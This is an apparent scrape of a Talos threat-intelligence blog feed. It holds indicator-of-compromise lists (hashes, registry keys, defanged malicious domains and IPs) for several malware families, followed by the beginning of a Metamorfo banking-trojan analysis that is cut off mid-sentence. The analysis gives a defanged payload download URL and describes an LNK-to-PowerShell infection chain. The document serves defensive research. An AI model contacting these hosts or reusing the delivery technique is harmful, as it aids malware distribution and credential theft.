CachePrefix</li></ul></li><li>&lt;HKCU&gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES <ul><li>Value Name: CachePrefix</li></ul></li><li>&lt;HKCU&gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY <ul><li>Value Name: CachePrefix</li></ul></li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>statsrichwork[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>files\information.txt</li><li>files\passwords.txt</li><li>US_d19ab989-a35f-4710-83df-7b2db7efe7c51551795182.zip</li></ul><b>File Hashes</b><br /><ul><li>19e073fb9fb7811440e873ae60578b28c06b0aec9e21d730f8205c81b7ababf5</li><li>201872934f7f6674af89597d1a819f79cf843578aa9928191561ebdb637a53cd</li><li>243e098e78e1ff111354e231fac6b01e69f473cb10c27f2485a568316c0395df</li><li>2b52ef895983a4778aaa66dd90cc8bb296ca3b96b891c087c4fcf483d5bf48c6</li><li>3c66d120d27778c2a1110170ad85eed2313fcc5cf55345cdbdc283ada76a86c1</li><li>42228a6bafdf985fc02536b17990299589d967ad44d22dbefdb2dbc44681741b</li><li>48437e0f2c8bc5f0d3f46fec63ce26b3b66dc65610e3c97b4fa8a1b643c8e2f1</li><li>4a2364a4b3e8ad43b505a616486ef537159c8b8df9fe140977c9ab6aa1bad658</li><li>4f80b59c35090b1dbdf94f73770c222352555e7112bec28efb189e3b340b4c2c</li><li>633bcbf980d9299324b3b0baefe80954f06e41a6f71267bfc83c8950a8932696</li><li>6705cf85955113629d95a7206deb524f82ed5a3fe04666d98423b944c3ce2156</li><li>6f74c88c2c04eb117c26d5283d83ac4735928bb50f76b2104be36f8101466aa3</li><li>70a7d3ac821670090237f52308fb6b1ca47e032d3de9267584f59abe247e536a</li><li>711c1db67575b1a795a4aeb439ada79ab8a7cc98f2c68cb0e2beacafa5d044de</li><li>8f815fbcf18c1bc554756233e3fa7d326645a30809042b068ac03daef649c307</li><li>911ce750a17ac1e43d53087630b1e3af416619aff2d086b89b6def0d0bfa927d</li><li>95aa51bc0016bf055d53f1d663b560c97d15d19956787aecf8af7933e6765e5b</li><li>a3347f536bef48b877e49fce133e86b864ef657137ab73db60b62436e2aca7b2</li><li>bb99c43836000b751e3fa1deda851b646f02be036ad9d86a09adb7963bec7b69</li><li>d3edf8ca17f1b41fa96ea9b4377d5778a7965345230425730940444469ce57fb</li><li>da37e831e94b3f7226688cf7f201ef4c032d393ee25bd2437d826a21e08c03b4</li><li>dedb1d0c69521f7c47abc2e6fa925642269fd40a00ea21270b7b950cb101f7be</li><li>f3dd18c0de2af39bfd1dc3498de48e31668f6fdeb89065dcc9e7a81ae6c5046e</li><li>f980768d4d68e75b6d83cff0c80ec153a80bf700f7df3bd53fe9f06bdafda01b</li><li>f99b50470431b2f91b80f3acccbf179441aa24bc702d3f2ba08f4f9f2357d6c8</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-1UpUKLJub_g/W-W2WjFlsXI/AAAAAAAABIk/R-Cg_xdboMktqus_GDX11FhHIYaqfggUwCLcBGAs/s1600/f99b50470431b2f91b80f3acccbf179441aa24bc702d3f2ba08f4f9f2357d6c8_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-1UpUKLJub_g/W-W2WjFlsXI/AAAAAAAABIk/R-Cg_xdboMktqus_GDX11FhHIYaqfggUwCLcBGAs/s400/f99b50470431b2f91b80f3acccbf179441aa24bc702d3f2ba08f4f9f2357d6c8_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-1Q7_b4dREMw/W-W2b64K8NI/AAAAAAAABIo/FsemIscFO9056HXvqO3VJEaqFqX4jFGpQCLcBGAs/s1600/4f80b59c35090b1dbdf94f73770c222352555e7112bec28efb189e3b340b4c2c_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-1Q7_b4dREMw/W-W2b64K8NI/AAAAAAAABIo/FsemIscFO9056HXvqO3VJEaqFqX4jFGpQCLcBGAs/s640/4f80b59c35090b1dbdf94f73770c222352555e7112bec28efb189e3b340b4c2c_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-KsGtIMVUmiA/W-W2j3iWFjI/AAAAAAAABIs/aJzEQ9fZKeAO1dAY7BugaCJLG1t2UXyFACLcBGAs/s1600/f3dd18c0de2af39bfd1dc3498de48e31668f6fdeb89065dcc9e7a81ae6c5046e_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://2.bp.blogspot.com/-KsGtIMVUmiA/W-W2j3iWFjI/AAAAAAAABIs/aJzEQ9fZKeAO1dAY7BugaCJLG1t2UXyFACLcBGAs/s640/f3dd18c0de2af39bfd1dc3498de48e31668f6fdeb89065dcc9e7a81ae6c5046e_umbrella.png" width="640" /></a></div><b><br /></b><br /><h3>Win.Worm.Brontok-6739140-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ </li><li>&lt;HKLM&gt;\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\winlogon\ </li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%SystemDrive%\autorun.inf</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\cute.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\imoet.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\lsass.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\smss.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\winlogon.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\smss.exe</li><li>%SystemDrive%\Data_Rahasia Administrator.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\winlogon.exe</li><li>%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\Empty.pif</li><li>%System32%\IExplorer.exe</li><li>%System32%\shell.exe</li><li>%SystemDrive%\Tiwi_Cute.exe</li><li>%System32%\tiwi.scr</li><li>%WinDir%\tiwi.exe</li><li>%SystemDrive%\present.txt</li><li>%SystemDrive%\tiwi.exe</li></ul><b>File Hashes</b><br /><ul><li>005aeac3a2685665e22aac6270c7effc4718c92737ace9f6215c1f3e93adf632</li><li>007cfb6540762317643054786cb91843f5f713f879ca20d2abcb63a02ab9c87f</li><li>010b717c887c1f7d8a0f08d73b01f37b6d7a871e2f17ea9dc60a1bcd379b0f8b</li><li>036e59256be20eeed60c1dc49f2182089bd22bbe5aef75bbfe234f9898571d96</li><li>03d0d49484f05ff4461d8bcb40c42c38f72cea2c5b673e93f1329dfecb3824dd</li><li>043f25f1981421906c255dd5379e878ec4c5a359c9492abd3880eaa3176a4578</li><li>052f01970798eb34c728da985358f05ba47134e84c381c96cea52f7274e74d31</li><li>05dbbe0b660825cd4f2453b1afcd483ee3523771bc22a743e913f5e867fa063a</li><li>064e0bbb5470221d65b575e930c7b615af574f4f8395d573afbaa034ae4ffc6b</li><li>06569b13aa7a18eea8a863c768fe47468e505a898a9b689c376ab3cb3f957b80</li><li>0676fd79294f4ca277380e44085176012b97e5e07ab652009ce85791294a6f95</li><li>068f0a2d6b99b2701ae41325851a6fa258059c535765c2eb9ba30fd94118b995</li><li>0721857c17edb718c984d002fd24e754672e3d2eccaef2dcbc78f7ce0a902eac</li><li>0830ddb3dd73dbdbe524db466a035a85ba2e1eff6de24738d7ab42acd4ce4da1</li><li>08fabe5f7aabaa4e2f8a432f9e8287c7c80073dc05dc4fc9e8590f1bf15c25c4</li><li>09600f1b158f792909a105e155bde59e24f6e46322a13b7109649d15c97689da</li><li>0b70dbba443121a8aed5e4adb630737a773622ef16415034f5e1ef7af9a18d28</li><li>0b7a26dd115453a5530b387338b18d05d826e5ac3174399567f03376e2e67335</li><li>0c902a3a4a2a36d64351861dc4d8c2ad74a1415aff9b5f71ffc3e740a691483f</li><li>0cb7d5f688faf979b0d53200b507c0ab49446e2fc798635dca699ca6bfc2cf53</li><li>0dc9618e5edc34a8ada892b5c5a403eb9e64eb8e51772d35f4ee79959bccb686</li><li>0e8a750df320de2ee02b70b9c27b77d835ffe4c0c57b0ec6aca73e2df78f39e3</li><li>0ed1e47a487b750d9fa86743fe7d8a285292bf68169d61a0097570dffae443a9</li><li>0ee895125c27f3def3a2a60a2c16b9a66e0c2752337e621ce3cf0a2d70372aeb</li><li>0ff2198fa27c38bfbbaeb1e56f28696ceed254b749ee3b44d1163d41ebac534b</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-wCXBexgwz28/Wz-6akBh85I/AAAAAAAAAbg/AeWyAjQMrJg7K6XFDEUtI5Ctk0_1u7ezACLcBGAs/s320/amp-email-threatgrid-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-wCXBexgwz28/Wz-6akBh85I/AAAAAAAAAbg/AeWyAjQMrJg7K6XFDEUtI5Ctk0_1u7ezACLcBGAs/s320/amp-email-threatgrid-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-yTyDpd5M22k/W-W2v-LH2AI/AAAAAAAABI4/nE-sxFinzlIe_6P6QgGYuDfQjpReWI12ACLcBGAs/s1600/09600f1b158f792909a105e155bde59e24f6e46322a13b7109649d15c97689da_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-yTyDpd5M22k/W-W2v-LH2AI/AAAAAAAABI4/nE-sxFinzlIe_6P6QgGYuDfQjpReWI12ACLcBGAs/s400/09600f1b158f792909a105e155bde59e24f6e46322a13b7109649d15c97689da_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/--b9lGzJ5wA0/W-W21yEFA4I/AAAAAAAABJA/9yKN9HDbrwo-bds4VqNKSN4vSZlwT8EvwCLcBGAs/s1600/0830ddb3dd73dbdbe524db466a035a85ba2e1eff6de24738d7ab42acd4ce4da1_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/--b9lGzJ5wA0/W-W21yEFA4I/AAAAAAAABJA/9yKN9HDbrwo-bds4VqNKSN4vSZlwT8EvwCLcBGAs/s640/0830ddb3dd73dbdbe524db466a035a85ba2e1eff6de24738d7ab42acd4ce4da1_tg.png" width="640" /></a></div><b><br /></b><br /><h3>Win.Trojan.Autoruner-6733593-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\WINSERVICES.EXE <ul><li>Value Name: Debugger</li></ul></li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>204[.]79[.]197[.]200</li><li>91[.]195[.]240[.]94</li><li>72[.]21[.]81[.]200</li><li>23[.]79[.]219[.]185</li><li>67[.]202[.]94[.]93</li><li>50[.]23[.]131[.]235</li><li>23[.]3[.]96[.]25</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>kz0t0g6xn457m449312vx962m32v69[.]ipcheker[.]com</li><li>17d98a5d[.]akstat[.]io</li><li>r0u603u61y8999y[.]directorio-w[.]com</li><li>4o91sy32347o7x636pk2084dk0p66z[.]ipgreat[.]com</li><li>8s8908905t67uc0a75zm35c78xq0ex[.]ipcheker[.]com</li><li>7r3u5sm670kplbt6w1036p7ployl36[.]ipcheker[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>\??\E:\autorun.inf</li><li>%UserProfile%\27F6471627473796E696D64614\winlogon.exe</li><li>\$RECYCLE.BIN.LNk</li></ul><b>File Hashes</b><br /><ul><li>00de9aefee7e84028781e5d88e23c7ac53d8a10aa97116411d43b6532112fa16</li><li>01474c0dacb671b37172b985d8e96bb688f2e4f6f8975a6bdab76c3ebb6ca29a</li><li>0206ba28fd335c6470736f976885f5916375e114ce442208f30aaca55525d41c</li><li>027b08647ec8a4976897114dcac6810acb215dc13805edd0986d4bce04528f59</li><li>02e94f61d5c4da2b4a3b8991278a77e937da0de55b2f5373f804344cae73dad8</li><li>033c6325a22ddee4d621558106fd297407f31e0713c7c2314024e8cbcdc0a5b3</li><li>05d0ef6586355e9255a5723ae5909602de6def71e64f3e1838211bb0d3c9de81</li><li>06bdc32de83eec39c9153b7944b8abc0137e3b69c80ac02e74d6903c656915e7</li><li>06e53af6c4bde93f7a9da0b90408e59b701d1ced02c5fb14fba45c7272452367</li><li>082831142fe7826130b5d5ac7673d9ae8f7f56e126348283e77fc3c88f4d5b0b</li><li>08617dcb9523e28efed1e47917b6f9dc6dfb534c6d0d7df0888e977099f4db71</li><li>09a8a4d6b7e8d68dcbf7279923f5d8322e4d46dea86ca1da0f553bdb1f5fc222</li><li>09c40f54a73303ddf1d6170f3cd06778583260e82b7dfe155a2f804346aadfc9</li><li>0b032c40e0877bd1c4aeca8bf56b87d0daacc781ad2cb025cdc7c3944074e816</li><li>0b979d82d329160c7f95cb8abc9ccc8e0ebb4f981ee321342e84a29ff33687f9</li><li>0be8709e38625829811638c2460a8eaa993569df882f4a7263747f91bd08970a</li><li>0e47b656aa6dfdc797ff650a7d1800639f7347d2af4fd0ae6520e02ff0cec9a0</li><li>0eeb8d4cb796e8460ea5c283deed8788356822e6a7916c9cec496dc7cf4f3ab2</li><li>101217714340fcd5d1194ac746d2b4c9d42f739f12b983ce33801d2baebb71ab</li><li>11e0b16cfcd0e45c21a1fbe9b7b14bf019f3e2ceb7894eee8e458eb6a7571c34</li><li>12e12efef70cc7824ea45771c844393d1e1b878a86def41acc01093249bc7e19</li><li>1374cf423bc66983991c7fd3e3767aedf67094cf5a3eff6eb695112b51dc5e6a</li><li>13910ca1a7fbadf757c082dde5d1724b6b46d36b9eae47d1bd968c66a67be3ba</li><li>17ea3123406cb0ef21c174f4f27a89d4cbd5b61ff1359ec9b8c756b311ee0f4d</li><li>183b07b0a5e93388d391deeac811b405d0cf46c66f3817efe535780a6d06c10a</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://www.blogger.com/blogger.g?blogID=1029833275466591797" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-rz8tNLHbJPQ/W-W3C8ylfuI/AAAAAAAABJI/cU97rpKwHyUyZzPIB_2lRBRqv3D6w_6oACLcBGAs/s1600/4cc53c51bed05eb3fc362b8a8436d5ba43b8c31ed6ceac9d3fd0d2fb521a9049_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-rz8tNLHbJPQ/W-W3C8ylfuI/AAAAAAAABJI/cU97rpKwHyUyZzPIB_2lRBRqv3D6w_6oACLcBGAs/s400/4cc53c51bed05eb3fc362b8a8436d5ba43b8c31ed6ceac9d3fd0d2fb521a9049_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-vqmu1IK2bXA/W-W3KCQMKvI/AAAAAAAABJQ/rYkGZHBtDWsQZoTu_4NC1YDTYmu8ZKPmACLcBGAs/s1600/6741cd93e13b4ed0283aadd39e53e496f41fe8cc51116679a8bb6d5d49e3fda0_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-vqmu1IK2bXA/W-W3KCQMKvI/AAAAAAAABJQ/rYkGZHBtDWsQZoTu_4NC1YDTYmu8ZKPmACLcBGAs/s640/6741cd93e13b4ed0283aadd39e53e496f41fe8cc51116679a8bb6d5d49e3fda0_tg.png" width="640" /></a></div><b><br /></b><b><br /></b> <br /><h3>Doc.Downloader.Emotet-6744157-1</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: Type</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: Start</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: ErrorControl</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: ImagePath</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: DisplayName</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: WOW64</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: ObjectName</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\dimcloud </li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\SERVICES\DIMCLOUD <ul><li>Value Name: Description</li></ul></li></ul><b>Mutexes</b><br /><ul><li>Global\I98B68E3C</li><li>Global\M98B68E3C</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>182[.]180[.]77[.]215</li><li>45[.]59[.]204[.]133</li><li>67[.]177[.]71[.]77</li><li>87[.]229[.]45[.]35</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>lionhomesystem[.]hu</li></ul><b>Files and or directories created</b><br /><ul><li>%AppData%\Microsoft\UProof\CUSTOM.DIC</li><li>%SystemDrive%\TEMP\~$18_11Informationen_betreffend_Transaktion.doc</li><li>%SystemDrive%\~$9441806.doc</li><li>%LocalAppData%\Temp\781.exe</li><li>%LocalAppData%\Temp\mq0dgaud.vrd.psm1</li><li>%LocalAppData%\Temp\xxlgesic.vav.ps1</li><li>%WinDir%\SysWOW64\dimcloudb.exe</li><li>%WinDir%\TEMP\9E64.tmp</li><li>%LocalAppData%\Temp\CVRF911.tmp</li></ul><b>File Hashes</b><br /><ul><li>14e4a394fa5994ce2ff8047f2bac46b385a5a6510205e4c65930c0af413c935e</li><li>500a319207a744b8d20c4bccb1c0b5b4f2fafc228cf05dd6bd2cb19b02444f58</li><li>53402a103a73ae604657be6e171cc017957fa1f3638fcbe976ca3af694ba0b7f</li><li>6bc0481d7b339a55f6493bfba40bca7819a3799a39b5beaf09490aafed45bc24</li><li>82448e012786f528fb7946640e84c6beadf34de21130a69bdc1538d4cc8cddf2</li><li>8d74c083778f9511c01916d183301686ac09a7011bbfa8f744a5816dc244340a</li><li>94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d</li><li>a2d01ed549ffcdd8de59939e7fae64d1455309ab7b8cbbaa6aae8f626803319b</li><li>a692ae61c540f3138866e74cd98aab9b368fdfe36233ccc408549a69a5a2c86f</li><li>dca6675566e48fbab773ad8c64504b809f8323ca48a8771d0a80ad7ccea1a2de</li><li>eb6b88afe59ff4fe3068586f6eea31a174deb0956f9fc72df68394bb007aee05</li><li>ec383b84e5038f061921a2a41b27d8635465826bce5636b21ede0fe061895972</li><li>f3641ae9463763cac44325547c7a6aeb954e8cc09a4ddf739c8d068c443761c9</li><li>f49cfd859d0cde4b95fbb1cd277a2e0668ac8bdbbc5e215af7da159e108ac5cd</li><li>f99dd238a630895697be11c2a551a3874a315b6f5a7bf752ab06cab6eb69e7b9</li><li>ffe52a1f56588e88eef218987e89a4caade5125e3a4478cb38ce85ec7733e03c</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-Z2ZWzmCaY-8/W-W4-pS_XwI/AAAAAAAABJg/mplZYg1ZR74LhbwMj065VZ2BrrSwVbxJwCLcBGAs/s1600/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-Z2ZWzmCaY-8/W-W4-pS_XwI/AAAAAAAABJg/mplZYg1ZR74LhbwMj065VZ2BrrSwVbxJwCLcBGAs/s400/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-3Gp1-XOLuXw/W-W5DVPS6aI/AAAAAAAABJs/8N73E4D5fEMx8aibHglvg_uuXj57jMQiwCLcBGAs/s1600/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://4.bp.blogspot.com/-3Gp1-XOLuXw/W-W5DVPS6aI/AAAAAAAABJs/8N73E4D5fEMx8aibHglvg_uuXj57jMQiwCLcBGAs/s640/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-fvUFekhQfXs/W-W5HyOsr2I/AAAAAAAABJw/YI_3QoKKd4scWMzFaML6Af-S4IS9_e4bwCLcBGAs/s1600/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://2.bp.blogspot.com/-fvUFekhQfXs/W-W5HyOsr2I/AAAAAAAABJw/YI_3QoKKd4scWMzFaML6Af-S4IS9_e4bwCLcBGAs/s640/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-lgX6rTIdKtc/W-W5Mp7eOCI/AAAAAAAABJ0/c6PD8QcjXZAe-EggZrNaVq2T1jrTkpe2ACLcBGAs/s1600/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://3.bp.blogspot.com/-lgX6rTIdKtc/W-W5Mp7eOCI/AAAAAAAABJ0/c6PD8QcjXZAe-EggZrNaVq2T1jrTkpe2ACLcBGAs/s640/94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d_malware.png" width="640" /></a></div><b><br /></b><b><br /></b><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/1YTslLRAkqg" height="1" width="1" alt=""/>2018-12-13T14:22:56.315-05:000https://blog.talosintelligence.com/2018/11/threat-roundup-1102-1109.htmlMetamorfo Banking Trojan Keeps Its Sights on Brazilhttp://feedproxy.google.com/~r/feedburner/Talos/~3/IryTCv_UMlU/metamorfo-brazilian-campaigns.htmlbanking trojanBrazildelphiMalware AnalysisMalware ResearchPowershelltrojannoreply@blogger.com (Paul Rascagneres)Thu, 08 Nov 2018 09:09:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-2971444325100835792<div dir="ltr" style="text-align: left;" trbidi="on"><i>This blog post was authored by <a href="https://www.blogger.com/profile/10442669663667294759">Edmund Brumaghin</a>, <a href="https://twitter.com/securitybeard">Warren Mercer</a>, <a href="https://twitter.com/r00tbsd">Paul Rascagneres</a>, and <a href="https://twitter.com/_vventura">Vitor Ventura</a>.</i><br /><br /><h2 id="h.ijn5vmrwa5i0">Executive Summary</h2><br />Financially motivated cybercriminals have used banking trojans for years to steal sensitive financial information from victims. They are often created to gather credit card information and login credentials for various online banking and financial services websites so this data can be monetized by the attackers. Cisco Talos recently identified two ongoing malware distribution campaigns being used to infect victims with banking trojans, specifically financial institutions' customers in Brazil. Additionally, during the analysis of these campaigns, Talos identified a dedicated spam botnet that is currently delivering malicious spam emails as part of the infection process.<br /><br /><h2 id="h.nmh42lcrtlu9">Distribution campaigns</h2><br />While analyzing these campaigns, Talos identified two separate infection processes that we believe attackers have used between late October and early November. These campaigns used different file types for the initial download and infection process, and ultimately delivered two separate banking trojans that target Brazilian financial institutions. Both campaigns used the same naming convention for various files used during the infection process and featured the abuse of link-shortening services to obscure the actual distribution servers used. The use of link shorteners also allows some additional flexibility. Many organizations allow their employees to access link shorteners from corporate environments, which could enable the attacker to shift where they are hosting malicious files, while also enabling them to leverage these legitimate services in email-based campaigns.<br /><br /><a name='more'></a><br /><h2 id="h.im8roqhq3l0d">Campaign 1</h2><br />Talos identified a spam campaign using a zipped file hosted on a free web hosting platform. This archive contains a Windows LNK file (Link). During this campaign, the filename followed the following format:<br /><br />"Fatura-XXXXXXXXXX.zip," where "XXXXXXXXXX" is a 10-digit numeric value.<br /><br />The LNK file format was:<br /><br />"__Fatura pendente - XXXX.lnk," where "XXXX" is a four-digit alphanumeric value.<br /><br />The purpose of the LNK file was to download a PowerShell script with an image filename extension (.bmp or .png):<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-8P58hfZMuxM/W-GaqPPYFBI/AAAAAAAAAi0/vL1xz9Ea6P0ElzEcBIVISegmG5IgUVw8ACLcBGAs/s1600/image16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="543" data-original-width="1600" height="216" src="https://3.bp.blogspot.com/-8P58hfZMuxM/W-GaqPPYFBI/AAAAAAAAAi0/vL1xz9Ea6P0ElzEcBIVISegmG5IgUVw8ACLcBGAs/s640/image16.png" width="640" /></a></div><br />The purpose of this command is to download and execute a PowerShell script from the attacker's URL. This new PowerShell script is also obfuscated:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-fUL8ld9S4dE/W-GauuBqOkI/AAAAAAAAAi4/CSa1uCY50j0O6x6UpEYJT2Ch6QV046QgwCLcBGAs/s1600/image13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="742" data-original-width="1589" height="298" src="https://2.bp.blogspot.com/-fUL8ld9S4dE/W-GauuBqOkI/AAAAAAAAAi4/CSa1uCY50j0O6x6UpEYJT2Ch6QV046QgwCLcBGAs/s640/image13.png" width="640" /></a></div><br />This script is used to download an archive hosted on Amazon Web Services (AWS):<br /><br />hXXps://s3-eu-west-1[.]amazonaws[.]com/killino2/image2.png.<br /><br />This archive contains two files:<br /><br /><ul><li>A dynamic library (.DLL)</li><li>A compressed payload (.PRX)</li></ul><br />The library decompresses the PRX file and 